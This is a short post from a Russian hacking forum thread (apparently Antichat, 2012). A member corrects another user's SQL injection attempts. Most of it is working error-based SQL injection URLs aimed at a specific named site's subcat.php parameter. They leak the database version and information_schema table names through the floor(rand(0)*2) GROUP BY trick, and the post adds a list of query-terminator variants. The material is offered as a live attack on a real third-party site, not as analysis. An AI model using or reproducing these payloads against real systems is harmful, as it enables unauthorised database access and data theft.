26.03.2012, 04:04
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от qaz
хм.. действительно
так не
http://baratro.ru/subcat.php?id=22%27+and%28select+1+from%28select+c ount%28*%29,concat%28%28select+table_name+from+inf ormation_schema.tables+limit+0,1%29,0x00,floor%28r and%280%29*2%29%29x+from+information_schema.tables +group+by+x%29a%29--+
так тоже
http://baratro.ru/subcat.php?id=22%27+or+1+group+by+concat%28%28sele ct+version%28%29%29,0x00,floor%28rand%280%29*2%29% 29having+min%280%29+or+1--+
о, так пашет
http://baratro.ru/subcat.php?id=22'+or+(@:=1)||@+group+by+concat((se lect+version()),@:=@-1)having+@||min(@:=0)--+f
блин, чёт не пойму, @:=1 там между собакой и двоеточием должно быть имя переменной которой присваиваем еденицу, как ето конструкция ваще ваызывает вывоод?
Зачем использование переменных?
Вот все выводит:
http://baratro.ru//subcat.php?id=22'or(1)+group+by+concat(version(),f loor(rand(0)*2))having(min(0))or(1)and'
Твой запрос не работает из-за комментария:
http://baratro.ru/subcat.php?id=22'and(select+1+from(select+count(*) ,concat((select+concat(version(),0x3a)+from+inform ation_schema.tables+limit+0,1),floor(rand(0)*2))x+ from+information_schema.tables+group+by+x)a)and'
Вместо and', тот, что на конце можно использовать 100500 вариантов:
-- a
and'
and'1'='1
%23
И т.д...
|
|
|